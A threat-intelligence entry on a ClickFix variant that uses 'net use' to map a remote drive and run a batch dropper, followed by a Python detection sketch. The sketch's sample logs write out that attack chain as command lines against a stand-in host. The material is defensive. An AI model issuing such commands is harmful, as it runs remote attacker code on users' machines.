216.73.217.80

Investigating a new Click-fix variant

Published 16/03/2026 10:28 · Modified 16/03/2026 10:52

Essential information

Tags
2026-03-16 clickfix
Related entities
6 observables, 13 techniques (mitre), 1 malware, 2 others

Description

A new variant of the ClickFix technique has been identified, in which attackers convince users to execute malicious commands on their devices through the Win + R shortcut. In this variation, a 'net use' command maps a network drive from an external server, after which a '.cmd' batch file on that drive is executed. The script downloads a ZIP archive, unpacks it, and launches a legitimate WorkFlowy application whose logic has been modified, with the malicious code hidden inside an '.asar' archive. The modified application acts as a C2 beacon and as a dropper for the final malware payload. The attack evades typical detection methods and uses Electron application bundling to hide the malicious code.
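The chain described above leaves a distinctive sequence in process-creation telemetry: a 'net use' mapping of a drive letter to a UNC path on an external host, followed on the same host and user by cmd.exe running a '.cmd' or '.bat' file from that drive letter. The following detection sketch is an added example and not part of the original report or of any vendor product; the Sysmon-style key=value log lines, the host names, users, paths and the `update-cdn.example.net` server are constructed, and the `INTERNAL_SUFFIXES` list is an assumed tuning knob for what counts as an internal file server.

```python
import ipaddress
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, one
# event per line as key=value pairs). Hosts, users, paths and the server
# name are made up for this example. The first pair mirrors the reported
# chain; the second pair is a benign mapping of an internal file server.
SAMPLE_EVENTS = [
    r'host=WS01 user=alice parent=C:\Windows\explorer.exe image=C:\Windows\System32\net.exe cmdline="net use Z: \\update-cdn.example.net\share /user:guest pass"',
    r'host=WS01 user=alice parent=C:\Windows\explorer.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /c Z:\update.cmd"',
    r'host=WS02 user=bob parent=C:\Windows\explorer.exe image=C:\Windows\System32\net.exe cmdline="net use H: \\fileserver01.corp.example\home"',
    r'host=WS02 user=bob parent=C:\Windows\explorer.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /c H:\scripts\backup.cmd"',
]

# Assumed internal DNS suffixes; tune to the environment being monitored.
INTERNAL_SUFFIXES = (".corp.example",)

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# net use <drive>: \\<host>\<share> ...  (net.exe or net1.exe)
NET_USE_RE = re.compile(r'^(?:net(?:\.exe)?|net1(?:\.exe)?)\s+use\s+([A-Za-z]):\s+\\\\([^\\\s]+)\\', re.IGNORECASE)
# <drive>:\...\something.cmd or .bat anywhere in a command line
SCRIPT_RE = re.compile(r'\b([A-Za-z]):\\\S*\.(?:cmd|bat)\b', re.IGNORECASE)


def parse_event(line):
    """Turn one key=value log line into a dict, stripping quotes from values."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def is_external_host(host):
    """True when the UNC host is a public IP literal or a qualified hostname
    outside the assumed internal suffixes. Unqualified names count as internal.
    Note: Python's is_global treats RFC 5737 documentation ranges as non-global."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        pass
    name = host.lower().rstrip(".")
    if "." not in name:
        return False
    return not name.endswith(INTERNAL_SUFFIXES)


def detect(lines):
    """Correlate 'net use' drive mappings with later execution of a .cmd/.bat
    from the mapped drive by the same host and user. Returns one alert per hit,
    tagged with whether the mapped server looks external."""
    mapped = {}   # (host, user, drive letter) -> remote host
    alerts = []
    for line in lines:
        ev = parse_event(line)
        who = (ev.get("host"), ev.get("user"))
        cmdline = ev.get("cmdline", "")
        m = NET_USE_RE.match(cmdline)
        if m:
            mapped[who + (m.group(1).upper(),)] = m.group(2)
            continue
        s = SCRIPT_RE.search(cmdline)
        if not s:
            continue
        remote = mapped.get(who + (s.group(1).upper(),))
        if remote is None:
            continue  # script ran from a drive we never saw mapped
        alerts.append({
            "host": ev["host"],
            "user": ev["user"],
            "drive": s.group(1).upper(),
            "remote_host": remote,
            "script": s.group(0),
            "external": is_external_host(remote),
            # Run-dialog launches appear with explorer.exe as the parent; a hint, not proof.
            "from_explorer": ev.get("parent", "").lower().endswith("\\explorer.exe"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the WS01 sequence is flagged as external; the WS02 mapping of an internal file server still produces a low-priority record, which is useful for tuning but should not page anyone. In a real pipeline the correlation window should be bounded in time and the mapping state keyed per logon session rather than per user name.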

External references